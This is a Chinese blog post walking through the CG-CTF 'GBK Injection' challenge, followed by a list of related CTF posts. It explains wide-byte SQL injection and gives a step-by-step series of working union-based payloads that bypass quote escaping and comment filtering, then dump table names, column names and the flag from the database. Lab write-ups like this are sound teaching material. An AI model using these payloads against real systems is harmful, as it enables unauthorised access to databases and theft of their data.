CG-CTF-Web-GBK Injection

最新推荐文章于 2021-12-14 20:33:39 发布
最新推荐文章于 2021-12-14 20:33:39 发布
阅读量1.2k 收藏 1
点赞数 1
分类专栏: CTF刷题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41617034/article/details/94338801
版权

GBK Injection

1.题目

在这里插入图片描述
2.首先我们进入题目地址,发现下图所示,首先猜测可能存在sql注入
在这里插入图片描述
3.于是我们尝试',但被转义了
在这里插入图片描述
4.被转义了,那咋办,此时,想到了URL中%df\结合会变成,如下图
在这里插入图片描述
5.因此我们可以闭合id的值,使用#--空格--+来注释最后一个’

  • 这里对#进行了过滤,但我们可以使用%23进行绕过
  • –空格也是标准的SQl注释语句,但这里对空格进行了过滤,但我们可以使用%20绕过
  • –+不是标准的SQL注释语句,但是+在查询语句中变成了空格,从而最后整体也变成了注释符–空格

–+变–空格,实例图:
在这里插入图片描述
6.那我们接下来依次进行查询爆破

  • 判断sql查询语句字段数量,可知sql查询语句有两个字段
    %df' order by 2 %23
  • 判断哪些字段可利用,可知sql查询语句第2字段可用
    %df' and 1=2 union select 1,2 %23
  • 判断当前数据库,这只当前数据库为sae-chinalover
    %df' and 1=2 union select 1,database() %23
  • 判断sae-chinalover数据库下所有的表名,分别为:ctf,ctf2,ctf3,ctf4,gbksqli,news
    %df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7361652D6368696E616C6F766572 %23
  • 判断ctf4表中的字段(这里是依次判断才发现ctf4里有flag),为:id,flag
    %df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746634 %23
  • 判断id与flag字段的值,结果为:1 flag{this_is_sqli_flag}
    %df' and 1=2 union select 1,group_concat(id,char(32),flag) from ctf4 %23

注:可能flag输入后还是错误,我认为可能后台管理出了一点问题,修改了flag值却没有更新
大家如果想了解sql(非盲注),请点击传送门

1stPeak
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
CG-CTF GBK Injection
venu_s的博客
11-03 344
CG-CTF WEB GBK Injection
gbk injection
sworddancing is the best one
09-27 956
以下是我在南邮上做的一道宽字节注入题,先将笔记总结于下,题目:   将网址复制下来,因为这将是我们进行注入的数据库的位置所在,因为该题提示是gbk数据库,所以咱们就有利用宽字节注入来解题的思路,接下来咱们用到sql注入工具的一款,sqlmap: 首先我们需要爆出数据库命令如下(爆出当前数据库(%df%27是双字节不转义单引号实现注入的方法--原理我会另外总结一片笔记出来链接:https://b...
CG CTF WEB GBK Injection
无限迭代中......
07-02 461
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1 题解: ctf4表里有个假flag 1、 id=1%df' and 1=2 %23 2、 id=1%df' order by 2 %23 3、 id=1%df' and 1=2 union select 1,2 %23 4、 id=1%df' and 1=2 uni...
CG CTF GBK Injection
qq_46389295的博客
02-23 192
题目链接 GBK Injection想到宽字节注入,首先了解宽字节注入的原理 http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 order by 2# 发现#被过滤掉了,遂使用%23(url编码) http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 order b...
CG-CTF GBKinject
热门推荐
单核CPU的小朋友的博客
11-26 3万+
题目地址:http://chinalover.sinaapp.com/SQL-GBK/index.php 首先观察源代码,发现是gbk编码,考虑到GBK INJECT 题目没有做任何过滤。 爆库名: http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,database()%23 库名:...
google-ctf:Google CTF
02-04
Google CTF 该存储库列出了2017-2019 Google CTF中使用的大多数挑战以及可用于运行这些挑战的大多数基础结构。 重要信息-2017、2018、2019和2020文件夹中的代码具有未修复的安全漏洞。 这些是故意存在的,并且在...
超微X11SPW-CTF主板用户手册
最新发布
04-01
超微X11SPW-CTF主板用户手册
My-CTF-Challenges
05-16
【标题】"我的CTF挑战"是一个集合,包含了一系列网络安全竞赛中的挑战,旨在提升参赛者在信息安全领域的技能和知识。这个挑战集可能是为一个名为"周大福"的活动或组织设计的。其中的一个具体挑战是"TCTF2018_决赛",...
saigar-ctf:Saigar CTF 平台
05-29
赛加尔CTF世界上第一个众包调查的 CTF 平台介绍Saigar CTF 是一个开源 CTF 平台,用于促进众包调查,可以扩展到数百个具有实时数据的并发用户。 Saigar CTF 平台促成的最大事件有500 多个用户,在6 小时内提交了8,...
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CGCTTF-GBK Injection
weixin_43803070的博客
05-13 352
查看题目给的信息,一看就知道是宽字节注入啦。 http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1�' 页面报错 判断字段,4的时候报错: http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1�' order by 4--+ 2的时候,回显正常: http://chinalover.sina...
CGCTF——GBK Injection
知足且坚定,温柔且上进
02-10 414
该题提示是gbk数据库,所以咱们就有利用宽字节注入来解题的思路。 (%df%27是双字节不转义单引号实现注入的方法) 原理参考:https://blog.csdn.net/weixin_42419856/article/details/82872653 参考2:https://lyiang.wordpress.com/2015/06/09/sql%E6%B3%A8%E5%85%A5%EF%BC%...
CG CTF WEB SQL Injection
无限迭代中......
07-04 619
http://chinalover.sinaapp.com/web15/index.php 题解: <!-- #GOAL: login as admin,then get the flag; error_reporting(0); require 'db.inc.php'; function clean($str){ if(get_magic_quotes_gpc()){ ...
CG CTF-Web-SQL Injection
feng的博客
09-08 246
前言 又被SQL注入打倒了。感觉自己对SQL注入这一块真的好差,需要好好补一补了。 WP 进入环境之后,要么直接f12,要么用burp抓包之后看response来看PHP代码,来进行代码审计。 <?php #GOAL: login as admin,then get the flag; error_reporting(0); require 'db.inc.php'; function clean($str){ if(get_magic_quotes_gpc()){ $str=strips
CG CTF-Web-GBK Injection
feng的博客
09-06 239
WP 由题目可知,这是一道宽字节注入的题目,就是不知道具体的题目是只进行宽字节的绕过即可还是里面还会过滤其他的字符。 宽字节注入的原理其实简单概括来就是:数据库编码为GBK时,加%df再加单引号,单引号转义出的反斜杠编码为%5c,在GBK编码中,%df%5c是繁体字,这时单引号成功逃逸。 首先打开题目,如下: 发现注入点是’1’。直接注入1’ --+会发现单引号被转义了,因此可以试试宽字节注入。 ?id=1%df' and 1=1 --+ 发现注入成功,之后就是正常的union注入方式。 ?id=1%
CGCTF-Web-SQL Injection(由查询语句制定注入策略、PHP stripslashes()和htmlentities())
Sea_Sand息禅
03-21 964
代码如下: <?php #GOAL: login as admin,then get the flag; error_reporting(0); require 'db.inc.php'; function clean($str){ if(get_magic_quotes_gpc()){ $str=stripslashes($str); } return htmlentiti...
injection
weixin_30598225的博客
03-10 259
injection(注入): 注入是Spring的思想,在使用Spring进行开发时,可以将对象交给spring进行管理,在初始化时spring创建一批对象,当你需要用的时候只要从spring的容器中获取对象,而不用自己去new,当然在对象创建的时候可以注入另一个对象。 通常是new一个依赖类再调用类实例的方法,这种开发存在的问题是new的类实例不好统一管理。Spring提出了依赖注入的思想...
NCTFGBK Injection另一种宽字节注入解法
克格莫
12-18 466
0x00题目: your sql:select id,title from news where id = '1' here is the information 0x01以前的题解是使用%df加上单引号,通过宽字节注入。另外#被转移,故使用%23代替#绕过。 但是今天我做的时候,发现另一个payload也可以: payload: 1’',此处第一个单引号是中文的 ‘,第二个单引号是英...
CTF-SQL注入入门题型
PolarPeak的博客
12-14 5425
CTF SQL注入
Ubuntu-CTF
07-28
CTFd是一个用于举办和参加CTF(Capture The Flag)安全竞赛的平台。根据引用\[1\]和引用\[2\]的内容,你可以按照以下步骤在Ubuntu上搭建CTFd平台: 1. 首先,确保你已经安装了虚拟机并配置好了Ubuntu系统。具体的...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1stPeak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值